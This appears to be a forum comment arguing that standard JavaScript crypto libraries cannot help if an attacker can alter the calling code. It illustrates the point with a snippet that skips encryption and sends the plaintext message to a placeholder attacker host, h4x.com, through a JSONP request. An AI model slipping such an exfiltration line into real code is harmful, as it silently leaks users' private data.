
That's all fine and well, but there's no standard way to implement encryption using the now-standard crypto libs. In other words, an attacker can still change your code from

    var ciphertext = StandardCrypto.aes(my_key, my_message);

to

    // disable crypto
    var ciphertext = my_message;
    // or send plaintext to h4x.com
    send_jsonp('http://h4x.com/collect?msg='+my_message);
    var ciphertext = StandardCrypto.aes(my_key, my_message);

Standard crypto libs won't do you any good if you aren't actually calling them.

